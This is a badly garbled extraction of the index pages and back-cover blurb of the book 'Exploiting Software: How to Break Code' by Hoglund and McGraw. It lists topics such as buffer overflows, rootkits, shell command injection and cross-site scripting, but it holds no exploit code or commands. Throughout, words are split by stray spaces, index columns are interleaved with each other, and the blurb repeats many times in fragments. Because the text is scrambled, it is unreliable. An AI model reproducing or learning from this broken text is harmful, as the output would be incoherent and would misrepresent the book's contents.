
At t ack unload rou tinpat es t er ns Regist er s

Rev er se engineer in g

ex am ining 2nd

for boron t ags 2nd

Classic at t acks ag ainst serv er soft w ar e

in bu ff er overf lo w 2nd in MI PS

Sur pr ising at t acks ag ainst clien t soft war e

in SPARC Regist ryTech k eysniqu es

f or cr aft ing m aliciou s inpu t

as at t ack t ar get s contThe rollable t echn ical

det ails of b uf fer ov er f low s

regm on to ol RegularRoot exp ressions k it s Relat ive pat h in ject ion

Ex pivloei pat t inhgt raSversal o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Relat soft e. ds Releaw sear guar Remot e at tacks 2nd Remot e procedure calls ( RPCs) Remot e xt erm s wit h serv er sof t ware Removin g observa ble eff ect s process r ecords 2nd 3rd 4t h Ren, Ch ris Replies, in ject ion wit h

report _o ut .t x t f ile 2nd 3rd require fu nct ion Reset PC f unction Resour ce files, ex ecut able code in Resour ce I Ds ret in st ruct ion Ret urn addr esses

• •

for inj ect ion v ect ors

Table of Content s

in bu ff er overf lo w at t ack s

I ndex

Rev erse com pilers [ See Source code; Decom pilers] Expl oit ing Softw a re How to Br e ak Code Rev erse engineering 2nd 3rd By Gr eg Hoglund , Gar y audit McGr access r equ irement s aw in API resou rces f or aut om atic auditWesley ing in 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h Pub lish er:bulk Addison bla ck Dat boxe:anFebruary alysis f or17, 2nd200 4 Pub breakpo in t s f or 2nd 3rd 4t h I SBN: 0- 20 1- 786 95 -8 code cov erage f or 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h Pages: 51 2 cracking to ols f or 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h 13t h 14t h 15t h 16t h 17t h 18t h 19t h debu ggers for 2nd 3rd 4t h 5t h deco mpiling in 2nd 3rd 4t h 5t h 6t h 7t h dev elopm en t of disassemblin g in 2nd 3rd

How w 2nd are 3rd br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fau d lt oes inj ectsof ion tin fir ew alls,g int graphin f or ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What oolsanaly cansisbe sed3rdt o b reak soft war e? Th is book p rov ides t he answ er s. grayt box f or u2nd I -Plan et Serv er 2nd 3rd 4t h 5t h 6t h

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d I DA plugins fo r 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h 13t h t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om in put tr acing for 2nd at t kern ack el, yaccess ou minu st fir st lear n h ow r eal at t acks are really carr ied ou t . leaking buf fer dat a in 2nd 3rd

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he legalit y of 2nd 3rd scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t mu lt it hr eadin g pr ogram s 2nd 3rd 4t h

pat ching in 2nd 3rd process ot ar s ine 2nd 3rd 4t hw5t 6t h t inue Whysnapsh sof t w ex ploit illh con

t o be a ser ious p r oblem

purpose of 2nd rea din g a nd net writin y init2nd When w gormkemor secur y m ech anisms

do n ot w or k

red point in g in 2nd single epping 2nd At tstack patint er ns version dif ferences for

eran sealysis engineer whitRev e box f or 2nd in g Revert ToSelf fu nct ion

Classic at tpay acks agon ainst er soft w ar e RI SC a rchit ect ures, loads [ See serv Payloads] Risk an d r isk assessm ent

Sur pr ising at t acks ag ainst clien t soft war e

act ual

def ined

Tech niqu es f or cr aft ing m aliciou s inpu t

for vulnerabilit ies 2nd in open -sy st ems 2nd

The t echn ical det ails of b uf fer ov er f low s

ROM 2nd

Root access, Root kneed it s f or Root kit s 2nd

Ex adva p lo inced t in gt opics S o ft2nd w a3rd re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak call hoo kin g f or 2nd 3rd 4t h 5t h 6t h 7t h soft w ar e. det ect ing for hard ware v iruses [ See Har dware v iruses] for hiding f iles and direct ories 2nd 3rd for int errupt s 2nd 3rd 4t h for low-lev el disk access 2nd hiding key loggin g 2nd net work su pport f or drivers 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h

pat ching binar y code 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h 13t h 14t h 15t h Trojan ex ecut able redirect ion 2nd 3rd 4t h 5t h 6t h 7t h Rou ters bla ck box an alysis f or buf fer o verf low in 2nd RPCs (rem ot e procedu re calls) ru n f un ct ion Run nin g processes, a tt ach ing t o 2nd



Table of Content s



I ndex

Run out s in code t racin g

Run t ime m emor y addresses, m apping Expl oit ing Softw a re How to Br e ak Code Run t ime t ra cing 2nd By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S ] [ T] [ U] [ V] [ W ] [ X] [ Z ] sam ple_callback f un ct ion Sat ellit es, exploit at ion of sav e in str uct ion SCADA soft ware weak nesses Scanco des scan f fu nct ion •

Table of Content s

Schedulin g pro cesses • I ndex2nd Scien t ific met hod reverse en gineering Expl oit ing Softwin a re How to Br e ak Code Script k iddies By Gr eg Hoglund , Gar y McGr aw Script ing. FileSystem Ob ject Script let . Ty peLib Pub Script s lish er: Addison Wesley Pub e: February buf ferDat o verf lows f rom 17, 200 4 cross-I SBN: site [ See 0- 20XSS 1- 786 (cro 95ss-sit -8 e script in g)] emb eddin g 51 2 Pages: in n onscr ip t elem ent s in script s 2nd misclassif icat ion with wit h client soft ware 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h scrr un. dll f ile 2nd 3rd 4t h 5t h

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Scrubb in g p roblem in Et hernet 2nd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? SeAccessCh eck f unct ion 2nd 3rd What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Sea rch pat hs in conf igurat ion f iles seccinit . c f ile

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d seccook . c f ile t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om secf ail. c file at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Second serial port int errupt Secondary I DE el int erru This m ust - hchann ave book mpt ay Secret scr ipt v kariables id die

shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Secrets and Lies (Sch neier) Securing Java (McGraw an d Felt en ) 2nd 3rd Securit Why y

sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

boron t ags f or

When w or k for buf fer ovnet er flows

secur it y m ech anisms do n ot w or k

in n et wor k- based soft ware

t ack on IAt nt ernet

pat t er ns

soft ware vs. applicat io n

Rev er se engineer in g

th rough ob scurit y

Securit y Engineering (And erson)

Classic at t acks ag ainst serv er soft w ar e

Securit y error han dlers

Securit y f laws, reverse engineering for

Sur pr ising at t acks ag ainst clien t soft war e

Securit y t est ing Seg ment ed GET requ s Tech niqu esestf or

cr aft ing m aliciou s inpu t

Self -decry pt ing pay loads 2nd 3rd Self -or ganizing sy st ems The t echn ical

det ails of b uf fer ov er f low s

Sen dKeyboar dComm and f unction 2nd Sen dm ail, Root o verf k itlow s in Ser ial EEPROM 2nd

Ex ial p lo i t in S o ft a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Ser port intgerrupt sw 2nd soft w ar e.ro l of client soft ware 2nd Ser ver cont Ser ver sof twar e 2nd adding users aut hent icat ion in 2nd blin d t ru st in 2nd conf igure t ru st in 2nd 3rd 4t h 5t h en viro nm en t variables in 2nd 3rd 4t h err or co de check ing in ex plorin g f ile sy st em s 2nd 3rd 4t h 5t h 6t h

FTP in ject ion point s in 2nd in put pat h tr acing in 2nd 3rd 4t h 5t h 6t h per mission s in herit ance in phase space an alysis in 2nd 3rd 4t h privilege escalat ion problem in 2nd 3rd 4t h process spawning in

• •

rem ot e x t erms wit h

Table of Content s

schedulin g processes on 2nd

I ndex

session I Ds in Expl oit ing Softw a re How to Br e ak Code shell com ma nd in ject ion in [ See Shell com m and inject ion ] By Gr eg Hoglund , Gar y McGr aw TFTP tr ust ed in put pr oblem in 2nd 3rd wit h lish local Pub er:sockets Addison2nd Wesley Ser verreference Pubside Datpage e: February 17,redir 200ects 4 Ser vice out ages from wo rms I SBN: 0- 20 1- 786 95 -8 Ser viceName v alu e Pages: 51 2 Session aut hent icat ion Session I Ds cookies for in serv er soft ware Set Break point fu nct ion

How oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Set EI Pdf un ct ion fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Set LEDS f unction What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Set SingleSt ep fu nct ion set snap fu nct ion 2nd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Set Sy st emI n form at ion fu nct ion tset echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om uid ut ilit y at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . sf c.dll file sf cfiles.d ll file

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Shared buf fers, leaking dat a in 2nd 3rd Shell code in em bedded sy st ems Shell com m and inject ion 2nd delim iters sof in 2nd 3rde Why t w ar

ex ploit w ill con t inue t o be a ser ious p r oblem

flut t ering windows fr om for binary buw ildor in gk 2nd 3rd it y Whenfile net secur

m ech anisms do n ot w or k

for t ext file bu ildin g th rough ar gum entt er s f rom At t ack pat ns ot h er progr ams Short - t erm fut u re of sof t ware 2nd 3rd 4t h 5t h

Rev er seI DSs engineer Signat ur e- based 2nd 3rdin g Signed/ u nsign ed m ismat ch es 2nd 3rd 4t h 5t h

ation, t acks Simple Classic script inj ect XSSag in ainst 2nd

serv er soft w ar e

Single st epping

Sur pr ising at t acks ag ainst clien t soft war e

in rev erse eng in eer in g 2nd in ru nt im e t racing 2nd

Tech niqu es f or cr aft ing m aliciou s inpu t

Single-st ep flag Size

The t echn ical det ails of b uf fer ov er f low s

buf fer 2nd

payload Root k it s Slashes (/ ) in alt erna te en coding 2nd 3rd 4t h 5t h Slid inlo g riegist ersSin SPARC Ex p t in g o ft w a re is slt i inw strar uct soft e.ion

f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak

2nd

Sm ar t obj ect s Smar tBit s t ool Smashing t he st ack Snapsh ot s, process 2nd 3rd 4t h 5t h 6t h Snif fers for I DSs for OS st ack ident if ication 2nd Social eng in eerin g in C5 at t acks

Sock et s, serv er soft ware with 2nd Soft I ce debugger Soft ware bad 2nd def ined essen t ial fut u re of 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h



vu lnerabilit ies

Table of Content s

Soft ware copy pro tect ion limit at ions



I ndex

Soft ware dist ribut ion, f ut u re of Expl oit ing Softw a re How to Br e ak Code Soft ware Fa ult I n ject ion (Voas and McGraw) 2nd By Grware eg Hoglund , Gar ym McGr Soft licen sing, ASP odelaw of Soft ware securit y v s. applicat ion secur ity Soft ware t est diff icult ies in Pub lish er:in g, Addison Wesley Solaris Pubsyst Datem e: sFebruary 17, 200 4 buf fer o verf low in I SBN: 0- 20 1- 786 95 -8 tar get mod els for 2nd Pages: 51 2 Soun d car d int erru pt Source code deco mpilers for in wh ite box an alysis 2nd vs. ex ecut able

How d oes SOURCES f ile sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? SourceScope tooru l 2nd What t ools beattuack sed for buf fer ovcan er flow s t o b reak soft war e? Th is book p rov ides t he answ er s. for whit e box analysis

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Space ch aract ers in equ ivalent request s tSPARC echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om sy st ems at t fun ackct,ion y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . call n est in g in payload con st ruct ion in 2nd 3rd 4t h

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he reg ister windows in scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t sta cks on 2nd

Special ch aract ers in par sing Special-pur puteat ex ionploit al un it sw ill Whypose sofcom t w ar

con t inue t o be a ser ious p r oblem

Special-pur pose OSs Spike t When ool

net w or k secur it y m ech anisms do n ot w or k

Spoofin g SpoonFTP, t riple-do y in 2nd At t ack patt tvulnerabilit er ns Spreadsheet s, XSS in sprin tf Rev fun cter ionse

engineer in g

Spy in g 2nd 3rd

Classic at tbox acks agsis ainst serv er SQL Serv er 7 , gray analy for 2nd

soft w ar e

SQL st at em en t s, buf fer ov erf lows from 2nd

Sur pr ising at t acks ag ainst clien t soft war e

St ack t races for helpct r. ex e

St ack ed applicat ions, concept ual view of

Tech niqu es f or cr aft ing m aliciou s inpu t

St ackGu ard t ool 2nd 3rd 4t h 5t h 6t h 7t h St ack s an d st ack ov erf low 2nd

The t echn ical det ails of b uf fer ov er f low s

att ack pat t er ns 2nd

except ion khan Root it sdler f rames over writin g in fix ed -size bu ff ers in 2nd buifft er ww 2nd Ex in p lo in overf g S oloft a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak in C+ + 2nd 3rd soft w ar e. in ject ion vector s f or NULL term inat ion in 2nd 3rd 4t h 5t h 6t h 7t h on PA- RI SC 2nd 3rd on SPARC 2nd St ackSh ield t ool St atem ent set s, h ost ile St ates in bu ff er overf lo w 2nd

in open -ended sy st em s in so ft ware 2nd mappin g 2nd St atic ana lysis t ools f or buf fer overf low at t ack s [ See also SourceScope] St atic st rings in buf fer ov er flow St atist ical windows in anom aly-based I DSs St ealt h act iv ities St egan ograph y



Table of Content s



I ndex

st epi com m and

St orage f iles, h iding Expl oit ing Softw a re How to Br e ak Code St ored procedu res By Gr egferHoglund , Gar y McGr buf o verf lows f rom 2nd aw in Oracle 9i st rcatPub fulish nct ion er: Addison Wesley st rcpy fu nct Pub Dation e: February 17, 200 4 buf fer o verf low f rom 2nd 3rd 4t h I SBN: 0- 20 1- 786 95 -8 in rev erse eng in eer in g Pages: 51 2 St ress t est ing St ring fu nct ions in buf fer overf low at t ack s 2nd 3rd st rlen fu nct ion 2nd st rn cat f unction 2nd 3rd st rn cpy f unct ion 2nd

How d oes Subopco des sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Subscr ip tion int servru ices What t ools canmsbe u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Subv ersiv e progra classificat ion of

Ex def p loined i t in2nd g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d tSWI echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om FT n et work at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Switches, black box analy sis for Sym bolic Link s, ov erf lo w in

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Syn chr onizat ion of packet s 2nd syscall f un ct ion syslog fun ct ion SystemWhy ca lls

sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

for reverse engineering hooking When

net w or k secur it y m ech anisms do n ot w or k

user-supplied v ariables passed t o SystemAt direct ories at tns ack ta rgets t ack patast er System f ile prot ect ion, disablin g

se sy st em Rev fu ncter ion

engineer in g

buf fer o verf lows f rom

at t2nd acks in PrClassic olog/ Epilog

ag ainst serv er soft w ar e

in sh ell com man d in ject ion

Sur pr ising at t acks ag ainst clien t soft war e

Per l calls to 2nd

System t im er int erru pt

Tech niqu es f or cr aft ing m aliciou s inpu t

System LoadAn dCallI mage fu nct ion System s

The t echn ical det ails of b uf fer ov er f low s

privileges f or 2nd softRoot ware as k it s

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T ] [ U] [ V] [ W ] [ X] [ Z ] T- SQL (t ran sact SQL) pr ot ocol 2nd Tags boron [ See Boron t ags] overf low in Taint mod e in Per l 2nd t•akesnap fu nct ion 2nd of 3rdContent s Table Tan sy st em s in • kers, em bedded I ndex Target ent sa re in at t ackto pat tern Expl oitcompon ing Softw How Br e aks 2nd Code Target soft ware By Gr eg Hoglund , Gar y McGr aw TARGETPATH environm ent variable Tax onom y of a tt ack pat t ern s 2nd 3rd 4t h PubUUCP lish er:daemo Addison Taylor n Wesley TCP/ Pub I P Dat e: February 17, 200 4 pack et I SBN: defragm 0- 20ent 1- 786 at ion 95in -8 port sPages: as ent51 ry 2p oint s Techn ology adopt ion rat es TELNET environ ment variables Temp orary f iles TERM en viron men t variable t erm fu nct ion

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Term in als fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? charact er inj ect ion in 2nd 3rd What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. escape codes for 2nd 3rd

Test ing met hodo log ies, f ault in ject ion f or 2nd 3rd

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Tex t files, sh ell com man d inj ect ion for t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om TFTP (Tiny FTP) at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . The PI T to ol Tho usan lines code ( KLOC) in bug rat es y2nd 3rd This m dust - h of ave book m ay shock ou—and Thr scread ipts,ken idum dieerat t r ing eat2nd m en t

it will cer t ainly educat e y ou. Get t ing bey ond t he f ound in m any hack ing book s, you w ill learn abou t

Thr ee- dimension al ph ase spa ce plot of p oint s Tim e t o m ark et pressu res

Why sof t imerDPC fun ct iont w ar e

ex ploit w ill con t inue t o be a ser ious p r oblem

Tim in g a tt ack s, det ect ing Tim in g When issues

net w or k secur it y m ech anisms do n ot w or k

in EEPROM

At t ack pat tdist er ns in geogra phically ribu ted syst em s Tiny FTP ( TFTP)

Rev er se engineer in g

Tit an applicat ion firewall t racerou te t ool

Classic at t acks ag ainst serv er soft w ar e

Tracin g co de [ See Code t ra cing] Trade secrets

Sur pr ising at t acks ag ainst clien t soft war e

Tradecra ft , digit al 2nd 3rd Tram poline ack 2nd 5t h Techattniqu es f3rd or 4t crhaft ing

m aliciou s inpu t

Tran sact SQL (T- SQL) prot ocol 2nd Tran sact ion- based st emdet s ails The t echnsyical

of b uf fer ov er f low s

Tran sport -lev el secur it y TRAP FLAG Root k it s Trav ersal, f ile sy st em 2nd

Ex p lo filt i t in Trigger ersg S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. clien t 2nd Trillian chat Triple-dot vulnerabilit y 2nd Tripwire, redirect ion with 2nd Troj an execu ta ble redirect io n drivers fo r 2nd 3rd 4t h 5t h 6t h wit h Tripwire 2nd Tru nk lines, cont rolling 2nd Tru ss t ool 2nd Tru st issu es

design -lev el in bu ff er overf lo ws in Java in serv er soft ware 2nd 3rd 4t h 5t h 6t h 7t h 8t h in put - based wit h u ser s Tru st ed sit es, reflect ion against Tur ing mach ines



Table of Content s



I ndex

Two- st age bu ff er ov erflow at t acks 2nd [ See also Tram poline att ack ] Type con fu sion at ta cks in Java Expl oit ing Softw a re How to Br e ak Code Ty pe saf e lan guages 2nd By Gr eg Hoglund Ty peLib, at t ack s o,nGar y McGr aw Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U ] [ V] [ W ] [ X] [ Z ] Un disclosed exploit s Un icode enco ding in equ ivalent request s 2nd Un iform Compu t er I n form at ion Transact io ns Act (UCI TA) Un iform resource id en t if ier ( URI ) dat a, locatin g ro ut ines f or 2nd Un iform resource lo cat ors ( URLs)

• •

equ ivalen t request 3rd Tablesof2nd Content s passing localI fndex ilen ames in place of 2nd

troit usting assum pt ions Expl Softw a re in How to Br e ak Code Un iversa l Tur in g m ach ines By Gr eg Hoglund , Gar y McGr aw UNI X env iron ment va riables UNI X-t o-UNI X copy prog ram (UUCP) Pub lish er: Un loadable drivAddison ers 2nd Wesley Publangu Dat e:ages February 17, 200 4 Un safe Un signed/ I SBN: signed 0- m 20ism 1- 786 at ches 95 -82nd 3rd 4t h 5t h Un t rust ed sources, Pages: 51 2 readin g f rom URI ( unif orm resou rce ident if ier) da ta, locatin g r out ines for 2nd URLs ( un iform resource lo cat ors) in equ iv alent request s 2nd 3rd passing local f ilen ames in place of 2nd tr ust assum pt ions in

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are US Vicenn es sof t ware f ailures fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? User int erfa ces f or serv er soft ware What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. User- cont ro lled filenam es, XSS in User- m o de debuggers

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d User- supp lied conf igurat ion f iles for elev at ed privilege t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om User- supp lied va riables, passed t o file sy st em calls at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Users, adding UTFenust coding This8 m - h ave

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he in m any hack ing book s, you w ill learn abou t

UUCP t o-UNI X copy progr am) scr ipt( UNI k idX-die t r eat m en t f ound

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V ] [ W ] [ X] [ Z ] Valgrind debugger Variables in bu ff er overf lo w at t ack s 2nd 3rd 4t h 5t h in PHP 2nd 3rd in serv er soft ware 2nd 3rd 4t h



user-suppliedTable of Content s

Ver f or rev erse en gineering • sion diff er en ces I ndex Vessel Man agem ent I to nf orm Sy st em (VTMI S) Expl oitTraf ingfic Softw a re How Br eation ak Code Virt ual m ach ines ( VMs) By Gr eg Hoglund , Gar y McGr aw buf fer o verf lows in 2nd 3rd en capsulat ion of Pub lish er: yAddison Wesley ex t ensibilit of Pub Dat e: February Virt ualQueryEx f un ct ion 17, 200 4 breakpo I SBN: in t s0f or 202nd 1- 786 3rd95 -8 for mem ory 51 qu2eryin g 2nd Pages: Virus check ers as react ive t echn ology Viruses dev elopm en t of hardware [ See Har dware v iruses] in client script s 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are poison pills f or fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Visibilit y o f fau lt s What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Vitek, I an 2nd

v on Bert alan ff y, Ludwig

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Voy ager spacecr aft t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om vsprint f f un ct io n at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . VT t erm inal esca pe codes Vt ablesm ust - h ave This

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he book s, you w ill learn abou t

VTMI S (Vessel agem I nf orm Sy st em) ing scr ipt k id dieTraf t r fic eatMan m en t fent ound in ation m any hack Vulnerabilit ies back tr acing from 2nd 3rd

Why collect ion ssof of t w ar e

ex ploit w ill con t inue t o be a ser ious p r oblem

def ined 2nd

When design -lev el net 2ndw or k

secur it y m ech anisms do n ot w or k

in creases in

t ack ent patftorer2nd ns riskAt assessm VxWor ks OS

Rev er se engineer in g

flash ROM in

in em bedded sy st em s

Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Wait Fo rKeyboard fu nct ion 2nd wcsn cat f un ction in h elpctr .ex e 2nd 3rd 4t h in WI NNT 2nd WDASM disassem bler Weak local calls,Table fin din of g 2nd 3rd 4tsh 5t h • Content Web br owser s anI d Act iv eX 2nd • ndex Web cod e and XML Expl oit ing Softw a re How to Br e ak Code Web logs By Gr eg Hoglund , Gar y McGr aw Web serv ers comm and- line pa ramet ers wit h Pub lish er: Addison ghost characters wit Wesley h Pub Dat e:icat February misclassif ion of 17, 200 4 Web spo Iofing SBN: 0- 20 1- 786 95 -8 Webalizer prog ram Pages: 51 2 WEP (wired equivalen t priv acy ) encry pt ion algorit hm Whit e box analysis 2nd vs. b lack box an alysis Whit e list s for inpu t

